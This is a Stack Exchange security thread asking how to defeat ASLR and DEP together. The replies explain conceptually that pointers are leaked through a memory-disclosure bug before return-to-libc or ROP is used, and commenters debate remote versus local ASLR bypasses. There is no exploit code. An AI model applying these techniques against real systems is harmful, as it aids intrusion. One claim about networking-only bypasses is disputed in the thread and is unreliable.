0

I have read some articles about bypassing DEP and ASLR , but it seems that they bypass ASLR and DEP by using the instructions in the modules not applying ASLR.But how to bypass ASLR and DEP in the modules applying both this two protection?

freedom2
  • 11
  • 1
  • 2
  • This question is answered in the accepted answer of this question: https://security.stackexchange.com/questions/18556/how-do-aslr-and-dep-work – Snappie Jul 02 '17 at 10:51

1 Answers1

0

Like you said, first ASLR will have to be defeated before any DEP circumvention can be applied. This is usually done by leaking pointers with a separate memory disclosure vulnerability. Then when the location of the code pages is known, the usual technique of a return to libc can be applied.

J.A.K.
  • 4,793
  • 13
  • 30
  • How can a leadking pointer with a separate memory disclosure vulnerability used to bypass ASLR?I have seen [this question](http://security.stackexchange.com/questions/22989/how-leaking-pointers-to-bypass-dep-aslr-works),but I do not understand quite well – freedom2 Feb 23 '17 at 02:23
  • ASLR is randomization. If you knew the place beforehand, or you could know the layout while performing the exploit, you can adjust your offsets and gain control. The main point is that ASLR does not prevent control of EIP, but tries to make it useless – J.A.K. Feb 23 '17 at 07:54
  • 1
    @freedom2 : aslr bypass is only for programs that uses networking : by leaking data to your server or you local program you guess the memory layout and generate an exploit that will cause a jump to the correct address for a rop chain by corrupting allocated size info. If your program doesn’t even perform a dns request, then I think aslr isn’t only a mitigation : it completely prevent remote code execution in the case of buffer overflows https://security.stackexchange.com/q/154310/36301 *(you have to find other kinds of vulnerabilities for code execution)*. – user2284570 Mar 19 '17 at 22:55
  • This is incorrect @user2284570. In fact the opposite is true. ASLR is most useful over the network, because infoleaks of that type over the network are rare. For a local attacker, ASLR is actually _easy_ to bypass, e.g. by using timing attacks. – forest Nov 29 '17 at 03:53
  • @Baal-zebub : I was talking about remote attacks that can’t use networking. things like buffer ovverun inside a .rar archiver. – user2284570 Nov 29 '17 at 04:26
  • Oh, you mean scriptless exploits, like rar exploits, a video or audio format exploit, etc. as opposed to already executing code trying to exploit another program, or trying to exploit over the network? – forest Nov 29 '17 at 04:29